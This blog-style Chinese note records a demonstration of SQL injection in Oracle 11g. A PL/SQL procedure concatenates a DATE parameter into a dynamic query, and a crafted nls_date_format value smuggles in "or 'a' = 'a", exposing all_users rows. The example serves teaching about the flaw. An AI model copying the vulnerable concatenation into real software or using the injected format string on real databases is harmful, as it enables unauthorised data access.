[20170912]sql injection例子.txt

[20170912]sql injection例子.txt

--//来之tom的例子,做一个记录.也许以后讲解需要!!

1.环境:
SCOTT@book> @ &r/ver1

PORT_STRING                    VERSION        BANNER
------------------------------ -------------- --------------------------------------------------------------------------------
x86_64/Linux 2.4.xx            11.2.0.4.0     Oracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit Production

create or replace procedure inj( p_date in date )
as
        l_rec   all_users%rowtype;
        c       sys_refcursor;
        l_query long;
begin
        l_query := '
        select *
          from all_users
         where created = ''' ||p_date ||'''';

        dbms_output.put_line( l_query );
        open c for l_query;

        for i in 1 .. 5
        loop
                fetch c into l_rec;
                exit when c%notfound;
                dbms_output.put_line( l_rec.username || '.....' );
        end loop;
        close c;
end;
/

SCOTT@book> show parameter nls_date_format
NAME             TYPE    VALUE
---------------- ------- ---------------------
nls_date_format  string  YYYY-MM-DD HH24:MI:SS

SCOTT@book> exec inj(sysdate)

        select *
          from all_users
         where created = '2017-09-12 08:47:16'
PL/SQL procedure successfully completed.
--//注意sql语句的输出.

2.修改环境变量定义:

SCOTT@book> alter session set nls_date_format = 'yyyy-mm-dd hh24:mi:ss"'' or ''a'' = ''a"';
Session altered.

SCOTT@book> exec inj(sysdate)

        select *
          from all_users
         where created = '2017-09-12 08:48:10' or 'a' = 'a'
TEST.....
WYL.....
BI.....
PM.....
SH.....

PL/SQL procedure successfully completed.